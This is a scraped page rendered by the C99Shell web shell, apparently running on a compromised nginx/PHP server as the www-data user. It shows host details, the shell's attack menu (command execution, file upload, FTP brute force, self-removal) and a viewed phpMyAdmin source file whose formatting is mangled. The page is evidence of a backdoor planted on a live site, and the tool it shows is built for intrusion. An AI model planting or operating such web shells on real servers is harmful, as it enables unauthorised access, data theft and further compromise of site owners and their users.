!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpMY/libraries/   drwxrwxr-x
Free 83.33 GB of 96.73 GB (86.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     server_links.inc.php (3.34 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 *
 * @package PhpMyAdmin
 */
if (! defined('PHPMYADMIN')) {
    exit;
}

/**
 * Check parameters
 */
require_once './libraries/common.inc.php';
require_once 
'./libraries/server_common.inc.php';

PMA_checkParameters(array('is_superuser''url_query'), truefalse);

// Don't print all these links if in an Ajax request
if (!$GLOBALS['is_ajax_request']) {
    
/**
     * Counts amount of navigation tabs
     */
    
$server_links_count_tabs 0;


    
/**
     * Put something in $sub_part
     */
    
if (! isset($sub_part)) {
        
$sub_part '';
    }


    
/**
     * Displays tab links
     * Put the links we assume are used less, towards the end
     */
    
$tabs = array();

    
$tabs['databases']['icon'] = 's_db.png';
    
$tabs['databases']['link'] = 'server_databases.php';
    
$tabs['databases']['text'] = __('Databases');

    
$tabs['sql']['icon'] = 'b_sql.png';
    
$tabs['sql']['link'] = 'server_sql.php';
    
$tabs['sql']['text'] = __('SQL');

    
$tabs['status']['icon'] = 's_status.png';
    
$tabs['status']['link'] = 'server_status.php';
    
$tabs['status']['text'] = __('Status');

    if (
$is_superuser && !PMA_DRIZZLE) {
        
$tabs['rights']['icon'] = 's_rights.png';
        
$tabs['rights']['link'] = 'server_privileges.php';
        
$tabs['rights']['text'] = __('Users');
    }

    
$tabs['export']['icon'] = 'b_export.png';
    
$tabs['export']['link'] = 'server_export.php';
    
$tabs['export']['text'] = __('Export');

    
$tabs['import']['icon'] = 'b_import.png';
    
$tabs['import']['link'] = 'server_import.php';
    
$tabs['import']['text'] = __('Import');

    
$tabs['settings']['icon'] = 'b_tblops.png';
    
$tabs['settings']['link'] = 'prefs_manage.php';
    
$tabs['settings']['text'] = __('Settings');
    
$tabs['settings']['active'] = in_array(basename($GLOBALS['PMA_PHP_SELF']),
        array(
'prefs_forms.php''prefs_manage.php'));

    
$tabs['synchronize']['icon'] = 's_sync.png';
    
$tabs['synchronize']['link'] = 'server_synchronize.php';
    
$tabs['synchronize']['text'] = __('Synchronize');

    if (! empty(
$binary_logs)) {
        
$tabs['binlog']['icon'] = 's_tbl.png';
        
$tabs['binlog']['link'] = 'server_binlog.php';
        
$tabs['binlog']['text'] = __('Binary log');
    }

    if (
$is_superuser && !PMA_DRIZZLE) {
        
$tabs['replication']['icon'] = 's_replication.png';
        
$tabs['replication']['link'] = 'server_replication.php';
        
$tabs['replication']['text'] = __('Replication');
    }

    
$tabs['vars']['icon'] = 's_vars.png';
    
$tabs['vars']['link'] = 'server_variables.php';
    
$tabs['vars']['text'] = __('Variables');

    
$tabs['charset']['icon'] = 's_asci.png';
    
$tabs['charset']['link'] = 'server_collations.php';
    
$tabs['charset']['text'] = __('Charsets');

    if (
PMA_DRIZZLE) {
        
$tabs['plugins']['icon'] = 'b_engine.png';
        
$tabs['plugins']['link'] = 'server_plugins.php';
        
$tabs['plugins']['text'] = __('Plugins');
    } else {
        
$tabs['engine']['icon'] = 'b_engine.png';
        
$tabs['engine']['link'] = 'server_engines.php';
        
$tabs['engine']['text'] = __('Engines');
    }

    echo 
PMA_generate_html_tabs($tabs, array());
    unset(
$tabs);



    
/**
     * Displays a message
     */
    
if (!empty($message)) {
        
PMA_showMessage($message);
        unset(
$message);
    }
}
// end if ($GLOBALS['is_ajax_request'] == true)
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0063 ]--